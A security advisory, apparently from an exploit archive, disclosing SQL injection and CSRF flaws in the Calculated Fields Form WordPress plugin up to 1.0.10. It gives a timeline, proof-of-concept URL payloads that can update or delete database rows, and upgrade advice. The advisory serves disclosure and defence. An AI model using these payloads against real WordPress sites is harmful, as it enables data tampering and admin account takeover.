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WordPress Calculated Fields Form 1.0.10 SQL Injection Vulnerability

Ibrahim Raafat
Security Risk High
web applications
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[+] Calculated Fields Form Wordpress Plugin <= 1.0.10 - Remote SQL Injection Vulnerability
[+] Author: Ibrahim Raafat
[+] Twitter: https://twitter.com/RaafatSEC
[+] Plugin: https://wordpress.org/plugins/calculated-fields-form/

[+] TimeLine
	[-] Feb 6 2015, The vulnerabilities reported
	[-] Feb 7 2015, Response and Confirming the vulnerabilities 
	[-] Feb 8 2015, First fixing released to version 1.0.11
	[-] Feb 17 2015, CSRF protection added to version 1.0.12
	[-] March 1 2015, Public Disclosure

[+] Download: https://downloads.wordpress.org/plugin/calculated-fields-form.1.0.10.zip

[+] Description:
	There are sql injection vulnerabilities in Calculated Fields Form Plugin
	which could allow the attacker to execute sql queries into database

[+] Vulnerable Code: [Red]

[+] POC: 

/wp-admin/options-general.php?page=cp_calculated_fields_form&u=2 and 1=1&name=InsertText 
/wp-admin/options-general.php?page=cp_calculated_fields_form&u=2 or 1=1&name=InsertText // Will update all
/wp-admin/options-general.php?page=cp_calculated_fields_form&c=21 and 1=1 
/wp-admin/options-general.php?page=cp_calculated_fields_form&d=3 and 1=2  Delete

These queries are execute without any csrf protection, The attacker can use this csrf vulnerability to execute queries in the sql by sending malicious page to the logged in admin

[+] Impact: Attacker can use this vulnerabilities to update admin password

[+] Recommendation: If you are using 1.0.12 or less, Upgrade the plugin ASAP

#  0day.today [2024-07-01]  #